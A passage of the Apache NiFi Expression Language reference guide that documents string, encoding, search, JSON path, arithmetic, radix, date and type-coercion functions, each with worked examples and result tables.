If the Subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:append('.gz')}` will return \"a brand new filename.txt.gz\".\n\n\n\n\n\n[.function]\n=== prepend\n\n*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of\n\tthe Subject. 
If the subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#\n\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"filename.txt\", then the Expression\n\t`${filename:prepend('a brand new ')}` will return \"a brand new filename.txt\".\n\n\n\n\n\n[.function]\n=== replace\n\n*Description*: [.description]#Replaces *all* occurrences of one literal String within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.Replace Examples\n|===================================================================\n| Expression | Value\n| `${filename:replace('.', '_')}` | `a brand new filename_txt`\n| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`\n| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replace('filename', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceFirst\n\n*Description*: [.description]#Replaces *the first* occurrence of one literal String or regular expression within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String (literal or regular expression pattern) to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.ReplaceFirst Examples\n|===================================================================\n| Expression | Value\n| `${filename:replaceFirst('a', 'the')}` | `the brand new filename.txt`\n| `${filename:replaceFirst('[br]', 'g')}` | `a grand new filename.txt`\n| `${filename:replaceFirst('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceFirst('\\w{8}', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceAll\n\n*Description*: [.description]#The `replaceAll` function takes two String arguments: a literal String or Regular Expression (NiFi uses the Java Pattern\n\tsyntax), and a replacement string. The return value is the result of substituting the replacement string for\n\tall patterns within the Subject that match the Regular Expression.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in Java syntax) to match in the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. 
If the _regular expression_
		argument uses Capturing Groups, back references are allowed in the _replacement_.#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the following
Expressions will provide the following results:



.ReplaceAll Examples
|=======================================================================================
| Expression | Value
| `${filename:replaceAll('\..*', '')}` | `a brand new filename`
| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`
| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`
| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`
|=======================================================================================






[.function]
=== replaceNull

*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,
	returns the Subject.#

*Subject Type*: [.subject]#Any#

*Arguments*:

	- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#

*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#

*Examples*: If the attribute "filename" has the value "a brand new filename.txt" and the attribute
	"hello" does not exist, then the Expression `${filename:replaceNull('abc')}` will return
	"a brand new filename.txt", while `${hello:replaceNull('abc')}` will return "abc".




[.function]
=== replaceEmpty

*Description*: [.description]#The `replaceEmpty` function returns the argument if the Subject is null or
	if the Subject consists only of white space (new line, carriage return, tab, space). Otherwise,
	returns the Subject.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null or empty.#

*Return Type*: [.returnType]#String#

*Examples*: If the attribute "filename" has the value "a brand new filename.txt" and the attribute
	"hello" has the value " ", then the Expression `${filename:replaceEmpty('abc')}` will return
	"a brand new filename.txt", while `${hello:replaceEmpty('abc')}` will return "abc".




[.function]
=== length

*Description*: [.description]#Returns the length of the Subject#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: If the attribute "filename" has a value of "a brand new filename.txt" and the attribute
	"hello" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`
	will return 0.


[[encode]]
== Encode/Decode Functions

Each of the following functions will encode a String according to the rules of the given data format.
[.function]
=== escapeJson

*Description*: [.description]#This function prepares the Subject to be inserted into a JSON document by escaping the characters
 in the String according to JSON String rules. The function correctly escapes quotes and control characters (tab, backslash,
 carriage return, form feed, etc.).#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is 'He didn't say, "Stop!"', then the Expression `${message:escapeJson()}`
 will return 'He didn't say, \"Stop!\"'




[.function]
=== escapeXml

*Description*: [.description]#This function prepares the Subject to be inserted into an XML document by escaping the characters
 in the String using XML entities. The function correctly escapes quotes, apostrophes, ampersands, <, > and
 control characters.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is '"bread" & "butter"', then the Expression `${message:escapeXml()}`
 will return '&quot;bread&quot; &amp; &quot;butter&quot;'




[.function]
=== escapeCsv

*Description*: [.description]#This function prepares the Subject to be inserted into a CSV document by escaping the characters
 in the String using the rules of RFC 4180. The function correctly escapes quotes and surrounds the String with quotes if needed.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is 'But finally, she left', then the Expression `${message:escapeCsv()}`
 will return '"But finally, she left"'




[.function]
=== escapeHtml3

*Description*: [.description]#This function prepares the Subject to be inserted into an HTML document by escaping the characters
 in the String using HTML entities. Supports only the HTML 3.0 entities.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is '"bread" & "butter"', then the Expression `${message:escapeHtml3()}`
 will return '&quot;bread&quot; &amp; &quot;butter&quot;'




[.function]
=== escapeHtml4

*Description*: [.description]#This function prepares the Subject to be inserted into an HTML document by escaping the characters
 in the String using HTML entities. Supports all known HTML 4.0 entities.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is '"bread" & "butter"', then the Expression `${message:escapeHtml4()}`
 will return '&quot;bread&quot; &amp; &quot;butter&quot;'




[.function]
=== unescapeJson

*Description*: [.description]#This function unescapes any JSON literals found in the String.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is 'He didn't say, \"Stop!\"', then the Expression `${message:unescapeJson()}`
 will return 'He didn't say, "Stop!"'
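A typical use of the escape functions is assembling structured text from raw attribute values. As a hedged
sketch (the surrounding JSON structure is purely illustrative), a property value such as

-----------------------------------------------
{ "event": "${message:escapeJson()}" }
-----------------------------------------------

stays well-formed even when "message" contains quotes or control characters. Each escape function is also
inverted by its unescape counterpart below, so `${message:escapeJson():unescapeJson()}` returns the original value.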
[.function]
=== unescapeXml

*Description*: [.description]#This function unescapes a String containing XML entity escapes to a String containing the
 actual Unicode characters corresponding to the escapes. Supports only the five basic XML entities (gt, lt,
 quot, amp, apos).#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is '&quot;bread&quot; &amp; &quot;butter&quot;', then the Expression `${message:unescapeXml()}`
 will return '"bread" & "butter"'




[.function]
=== unescapeCsv

*Description*: [.description]#This function unescapes a String from a CSV document according to the rules of RFC 4180.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is '"But finally, she left"', then the Expression `${message:unescapeCsv()}`
 will return 'But finally, she left'




[.function]
=== unescapeHtml3

*Description*: [.description]#This function unescapes a String containing HTML 3.0 entities to a String containing the
 actual Unicode characters corresponding to the escapes. Supports only HTML 3.0 entities.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is '&quot;bread&quot; &amp; &quot;butter&quot;', then the Expression `${message:unescapeHtml3()}`
 will return '"bread" & "butter"'




[.function]
=== unescapeHtml4

*Description*: [.description]#This function unescapes a String containing HTML 4.0 entities to a String containing the
 actual Unicode characters corresponding to the escapes. Supports all known HTML 4.0 entities.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "message" attribute is '&quot;bread&quot; &amp; &quot;butter&quot;', then the Expression `${message:unescapeHtml4()}`
 will return '"bread" & "butter"'




[.function]
=== urlEncode

*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an
	attribute value to indicate the URL of a website.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: We can URL-encode an attribute named "url" by using the Expression `${url:urlEncode()}`. If
	the value of the "url" attribute is "https://nifi.apache.org/some value with spaces", this
	Expression will then return "https://nifi.apache.org/some%20value%20with%20spaces".




[.function]
=== urlDecode

*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If we have a URL-encoded attribute named "url" with the value
	"https://nifi.apache.org/some%20value%20with%20spaces", then the Expression
	`${url:urlDecode()}` will return "https://nifi.apache.org/some value with spaces".
[.function]
=== base64Encode

*Description*: [.description]#Returns a Base64-encoded String. This is useful for being able to transfer binary data as ASCII.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: We can Base64-encode an attribute named "payload" by using the Expression
	 `${payload:base64Encode()}`. If the attribute "payload" has a value of "admin:admin",
	 then the Expression `${payload:base64Encode()}` will return "YWRtaW46YWRtaW4=".




[.function]
=== base64Decode

*Description*: [.description]#Reverses the Base64 encoding of the given String.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If we have a Base64-encoded attribute named "payload" with the value
	"YWRtaW46YWRtaW4=", then the Expression
	`${payload:base64Decode()}` will return "admin:admin".



[[searching]]
== Searching

Each of the following functions is used to search its subject for some value.


[.function]
=== startsWith

*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,
	`false` otherwise.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for#


*Return Type*: [.returnType]#Boolean#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the Expression
	`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will
	return `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.





[.function]
=== endsWith

*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,
	`false` otherwise.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for#

*Return Type*: [.returnType]#Boolean#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the Expression
	`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will
	return `false`. `${filename:toUpper():endsWith('TXT')}` returns `true`.





[.function]
=== contains

*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for#

*Return Type*: [.returnType]#Boolean#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the Expression
	`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will
	return `false`. `${filename:toUpper():contains('NEW')}` returns `true`.





[.function]
=== in

*Description*: [.description]#Returns `true` if the Subject matches one of the provided arguments.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value1_# : [.argDesc]#First possible matching value#
	- [.argName]#_valueN_# : [.argDesc]#Nth possible matching value#

*Return Type*: [.returnType]#Boolean#

*Examples*: If the "myEnum" attribute has the value "JOHN", then the Expression
	`${myEnum:in("PAUL", "JOHN", "MIKE")}` will return `true`. `${myEnum:in("RED", "GREEN", "BLUE")}` will
	return `false`.
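Because `in` performs an exact, case-sensitive match, a case-insensitive variant can be sketched by
normalizing the Subject first:

-----------------------------------------------
${myEnum:toUpper():in("PAUL", "JOHN", "MIKE")}
-----------------------------------------------

This returns `true` whether "myEnum" contains "john", "John", or "JOHN".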
`${myEnum:in(\"RED\", \"GREEN\", \"BLUE\")}` will\n\treturn `false`.\n\n\n\n\n\n[.function]\n=== find\n\n*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the\n\tRegular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.find Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`\n| `${filename:find('Brand.*')}` | `false`\n| `${filename:find('brand')}` | `true`\n|=======================================================================================\n\n\n\n\n\n[.function]\n=== matches\n\n*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.matches Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:matches('a.*txt')}` | `true`\n| `${filename:matches('brand')}` | `false`\n| `${filename:matches('.+brand.+')}` | `true`\n|=======================================================================================\n\n\n\n\n[.function]\n=== indexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *first* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.indexOf Examples\n|===============================================\n| Expression | Value\n| `${filename:indexOf('a.*txt')}` | `-1`\n| `${filename:indexOf('.')}` | `20`\n| `${filename:indexOf('a')}` | `0`\n| `${filename:indexOf(' ')}` | `1`\n|===============================================\n\n\n\n\n[.function]\n=== lastIndexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *last* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. 
*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#

*Return Type*: [.returnType]#Number#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", then the following
Expressions will provide the following results:

.lastIndexOf Examples
|=======================================================================================
| Expression | Value
| `${filename:lastIndexOf('a.*txt')}` | `-1`
| `${filename:lastIndexOf('.')}` | `20`
| `${filename:lastIndexOf('a')}` | `17`
| `${filename:lastIndexOf(' ')}` | `11`
|=======================================================================================


[.function]
=== jsonPath

*Description*: [.description]#The `jsonPath` function generates a string by evaluating the Subject as JSON and applying a JSON
 path expression. An empty string is generated if the Subject does not contain valid JSON, the _jsonPath_ is invalid, or the path
	does not exist in the Subject. If the evaluation results in a scalar value, the string representation of the scalar value is
	generated. Otherwise, a string representation of the JSON result is generated. A JSON array of length 1 is special-cased:
	when `[0]` is a scalar, the string representation of `[0]` is generated.^1^#

*Subject Type*: [.subject]#String#

*Arguments*:
	 [.argName]#_jsonPath_# : [.argDesc]#the JSON path expression used to evaluate the Subject.#

*Return Type*: [.returnType]#String#

*Examples*: If the "myJson" attribute is

..........
{
 "firstName": "John",
 "lastName": "Smith",
 "isAlive": true,
 "age": 25,
 "address": {
 "streetAddress": "21 2nd Street",
 "city": "New York",
 "state": "NY",
 "postalCode": "10021-3100"
 },
 "phoneNumbers": [
 {
 "type": "home",
 "number": "212 555-1234"
 },
 {
 "type": "office",
 "number": "646 555-4567"
 }
 ],
 "children": [],
 "spouse": null
}
..........

.jsonPath Examples
|===================================================================
| Expression | Value
| `${myJson:jsonPath('$.firstName')}` | `John`
| `${myJson:jsonPath('$.address.postalCode')}` | `10021-3100`
| `${myJson:jsonPath('$.phoneNumbers[?(@.type=="home")].number')}`^1^ | `212 555-1234`
| `${myJson:jsonPath('$.phoneNumbers')}` | `[{"type":"home","number":"212 555-1234"},{"type":"office","number":"646 555-4567"}]`
| `${myJson:jsonPath('$.missing-path')}` | _empty_
| `${myJson:jsonPath('$.bad-json-path..')}` | _exception bulletin_
|===================================================================

An empty subject value or a subject value with an invalid JSON document results in an exception bulletin.

[[numbers]]
== Mathematical Operations and Numeric Manipulation

For those functions that support the Decimal and Number (whole number) types, the return value type depends on the input types. If either the
subject or the argument is a Decimal, the result will be a Decimal. If both values are Numbers, the result will be a Number. This includes
`divide`: dividing one whole Number by another performs integer division. This preserves backwards compatibility and avoids forcing rounding errors.
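As a quick illustration of these type rules, assume the "fileSize" attribute has the value `100`:

-----------------------------------------------
${fileSize:divide(8)}             returns 12   (Number / Number, integer division)
${fileSize:toDecimal():divide(8)} returns 12.5 (Decimal input, Decimal result)
-----------------------------------------------

Coercing either operand to a Decimal with `toDecimal` (described under <<type_cast>>) is the way to opt into fractional results.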
[.function]
=== plus

*Description*: [.description]#Adds a numeric value to the Subject. If either the argument or the Subject cannot be
	coerced into a Number, returns `null`.#

*Subject Type*: [.subject]#Number or Decimal#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#

*Return Type*: [.returnType]#Number or Decimal (depending on input types)#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`
	will return the value `1100`.





[.function]
=== minus

*Description*: [.description]#Subtracts a numeric value from the Subject.#

*Subject Type*: [.subject]#Number or Decimal#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#

*Return Type*: [.returnType]#Number or Decimal (depending on input types)#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`
	will return the value `0`.





[.function]
=== multiply

*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#

*Subject Type*: [.subject]#Number or Decimal#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to multiply the Subject by#

*Return Type*: [.returnType]#Number or Decimal (depending on input types)#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`
	will return the value `102400`.




[.function]
=== divide

*Description*: [.description]#Divides the Subject by a numeric value and returns the result.#

*Subject Type*: [.subject]#Number or Decimal#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#

*Return Type*: [.returnType]#Number or Decimal (depending on input types)#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`
	will return the value `8`.




[.function]
=== mod

*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide
	the Subject by the value of the argument and return not the quotient but rather the remainder.#

*Subject Type*: [.subject]#Number or Decimal#

*Arguments*:

	- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#

*Return Type*: [.returnType]#Number or Decimal (depending on input types)#

*Examples*: If the "fileSize" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`
	will return the value `4`.





[.function]
=== toRadix

*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional second argument can be used to indicate the minimum number of characters to be used. If the converted value has fewer than this number of characters, the number will be padded with leading zeroes.
If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#
	- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#

*Return Type*: [.returnType]#String#

*Examples*: If the "fileSize" attribute has a value of 1024, then the following Expressions will yield
	the following results:


.toRadix Examples
|=======================================================================================
| Expression | Value
| `${fileSize:toRadix(10)}` | `1024`
| `${fileSize:toRadix(10, 1)}` | `1024`
| `${fileSize:toRadix(10, 8)}` | `00001024`
| `${fileSize:toRadix(16)}` | `400`
| `${fileSize:toRadix(16, 8)}` | `00000400`
| `${fileSize:toRadix(2)}` | `10000000000`
| `${fileSize:toRadix(2, 16)}` | `0000010000000000`
|=======================================================================================

[.function]
=== fromRadix

*Description*: [.description]#Converts the Subject from a specified Radix (or number base) to a base ten whole number. The Subject will be converted as-is, without interpretation, and all characters must be valid for the base being converted from. For example, converting "0xFF" from hex will not work, because "x" is an invalid hex character. If a decimal is passed as the subject, it will first be converted to a whole number and then processed.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_Subject Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#

*Return Type*: [.returnType]#Number#

*Examples*: If the "fileSize" attribute has a value of 1234A, then the following Expressions will yield
	the following results:


.fromRadix Examples
|=======================================================================================
| Expression | Value
| `${fileSize:fromRadix(11)}` | `17720`
| `${fileSize:fromRadix(16)}` | `74570`
| `${fileSize:fromRadix(20)}` | `177290`
|=======================================================================================
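The two radix functions invert one another, which gives a compact way to round-trip a value through another
base. For example, with "fileSize" still equal to `1024`:

-----------------------------------------------
${fileSize:toRadix(16):fromRadix(16)}
-----------------------------------------------

returns `1024`: `toRadix(16)` produces the String `400`, and `fromRadix(16)` converts it back to a base ten Number.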
[.function]
=== random

*Description*: [.description]#Returns a random whole number (0 to 2^63^ - 1) using an insecure random number generator.#

*Subject Type*: [.subjectless]#No subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#Number#

*Examples*: `${random():mod(10):plus(1)}` returns a random number between 1 and 10, inclusive.

[.function]
=== math

*Description*: [.description]#ADVANCED FEATURE. This expression is designed to be used by advanced users only. It utilizes Java Reflection to run arbitrary java.lang.Math static methods. The exact API will depend on the version of Java you are running. The Java 8 API can be found here: link:https://docs.oracle.com/javase/8/docs/api/java/lang/Math.html[https://docs.oracle.com/javase/8/docs/api/java/lang/Math.html^]
 +
In order to run the correct method, the parameter types must be correct. The Expression Language "Number" (whole number) type is interpreted as a Java "long". The "Decimal" type is interpreted as a Java "double". Running the desired method may require calling "toNumber()" or "toDecimal()" in order to "cast" the value to the desired type. This also is important to remember when cascading "math()" calls, since the return type depends on the method that was run.#

*Subject Type*: [.subject .subjectless]#Subjectless, Number or Decimal (depending on the desired method to run)#

*Arguments*:

	- [.argName]#_Method_# : [.argDesc]#The name of the Java Math method to run#
	- [.argName]#_Optional Argument_# : [.argDesc]#Optional argument that acts as the second parameter to the method.#

*Return Type*: [.returnType]#Number or Decimal (depending on method run)#

*Examples*:

	- ${math("random")} runs Math.random().

	- ${literal(2):toDecimal():math("pow", 2.5)} runs Math.pow(2D, 2.5D).

	- ${literal(64):toDecimal():math("cbrt"):toNumber():math("max", 5)} runs Math.max((Double.valueOf(Math.cbrt(64D))).longValue(), 5L). The toDecimal() call is necessary because "cbrt" takes a "double" as input and "64" would otherwise be interpreted as a long. Similarly, the toNumber() call is necessary because "cbrt" returns a double while the "max" method must have parameters of the same type, and "5" is interpreted as a long.

	- ${literal(5.4):math("scalb", 2)} runs Math.scalb(5.4, 2). This example is important because NiFi EL treats all whole numbers as "longs" and there is no concept of an "int". "scalb" takes a second parameter of an "int" and it is not overloaded to accept longs, so it could not be run without special type handling. In the instance where the Java method cannot be found using parameters of type "double" and "long", the "math()" EL function will attempt to find a Java method with the same name but parameters of "double" and "int".

	- ${first:toDecimal():math("pow", ${second:toDecimal()})} where the attributes evaluate to "first" = 2.5 and "second" = 2. This example runs Math.pow(2.5D, 2D). The explicit calls to toDecimal() are important because of the dynamic nature of EL. When creating the flow, the user cannot know whether the expression language values will be interpreted as whole numbers or not. In this example, without the explicit calls to toDecimal(), the "math" function would attempt to run a Java method "pow" with types "double" and "long" (which doesn't exist).

[[dates]]
== Date Manipulation



[[format]]
[.function]
=== format

*Description*: [.description]#Formats a number as a date/time according to the format specified by the argument. The argument
	must be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that
	represents the number of milliseconds since Midnight GMT on January 1, 1970.
The number will be evaluated using the local
	time zone unless specified in the second optional argument.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#
	- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use (in the Java TimeZone syntax)#

*Return Type*: [.returnType]#String#

*Examples*: If the attribute "time" has the value "1420058163264", then the following Expressions will yield
	the following results:

.format Examples
|============================================================================
| Expression | Value
| `${time:format("yyyy/MM/dd HH:mm:ss.SSS\'Z'", "GMT")}` | `2014/12/31 20:36:03.264Z`
| `${time:format("yyyy/MM/dd HH:mm:ss.SSS\'Z'", "America/Los_Angeles")}` | `2014/12/31 12:36:03.264Z`
| `${time:format("yyyy/MM/dd HH:mm:ss.SSS\'Z'", "Asia/Tokyo")}` | `2015/01/01 05:36:03.264Z`
| `${time:format("yyyy/MM/dd", "GMT")}` | `2014/12/31`
| `${time:format("HH:mm:ss.SSS\'Z'", "GMT")}` | `20:36:03.264Z`
| `${time:format("yyyy", "GMT")}` | `2014`
|============================================================================





[.function]
=== toDate

*Description*: [.description]#Converts a String into a Date data type, based on the format specified by the argument. The argument
	must be a String in valid Java SimpleDateFormat syntax. The Subject is expected to be a String that is formatted
	according to the argument. The date will be evaluated using the local time zone unless specified in the second optional argument.#

*Subject Type*: [.subject]#String#

*Arguments*:

		- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat syntax.#
		- [.argName]#_time zone_# : [.argDesc]#Optional argument that specifies the time zone to use when parsing the Subject, in the Java TimeZone syntax.#


*Return Type*: [.returnType]#Date#

*Examples*: If the attribute "year" has the value "2014" and the attribute "time" has the value "2014/12/31 15:36:03.264Z",
	then the Expression `${year:toDate('yyyy', 'GMT')}` will return a Date data type with a value representing Midnight GMT on
	January 1, 2014. The Expression `${time:toDate("yyyy/MM/dd HH:mm:ss.SSS'Z'", "GMT")}` will result in a Date data type for
	15:36:03.264 GMT on December 31, 2014.

Often, this function is used in conjunction with the <<format>> function to change the format of a date/time. For example,
if the attribute "date" has the value "12-24-2014" and we want to change the format to "2014/12/24", we can do so by
chaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy/MM/dd')}`.
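Because a Date can also round-trip through a Number of milliseconds, simple date arithmetic can be sketched the
same way. For example, shifting the parsed "date" attribute forward by one day (86400000 milliseconds):

-----------------------------------------------
${date:toDate('MM-dd-yyyy'):toNumber():plus(86400000):format('yyyy/MM/dd')}
-----------------------------------------------

For the "12-24-2014" value above, this returns `2014/12/25`.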
[.function]
=== now

*Description*: [.description]#Returns the current date and time as a Date data type object.#

*Subject Type*: [.subjectless]#No Subject#

*Arguments*: No arguments

*Return Type*: [.returnType]#Date#

*Examples*: We can get the current date and time as a Date data type by using the `now` function: `${now()}`. As an example,
	on Wednesday December 31st, 2014 at 3:36:03.264 PM EST, `${now()}` would be evaluated to be a
	Date type representing that time. Since a whole Expression Language expression can only return a String, the result would be formatted as
	`Wed Dec 31 15:36:03 EST 2014` when the expression completes.

Utilizing the <<toNumber>> method, `now` can provide the current date and time as the number of milliseconds since
Midnight GMT on January 1, 1970. For instance, if instead of `${now()}` the expression `${now():toNumber()}`
were run in the previous example, it would output `1420058163264`. This form provides millisecond-level precision and makes it
possible to manipulate the value numerically.

.now Examples
|==================================================================================================================
| Expression | Value
| `${now()}` | A Date type representing the current date and time to the nearest millisecond
| `${now():toNumber()}` | The number of milliseconds since midnight GMT Jan 1, 1970 (`1420058163264`, for example)
| `${now():toNumber():minus(86400000)}` | A number representing the time 24 hours ago
| `${now():format('yyyy')}` | The current year
| `${now():toNumber():minus(86400000):format('E')}` | The day of the week that was yesterday,
													 as a 3-letter abbreviation (for example, `Wed`)
|==================================================================================================================




[[type_cast]]
== Type Coercion

[.function]
=== toString

*Description*: [.description]#Coerces the Subject into a String#

*Subject Type*: [.subject]#Any type#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of the "fileSize" attribute to a number and
	back to a String.



[.function]
=== toNumber

*Description*: [.description]#Coerces the Subject into a Number#

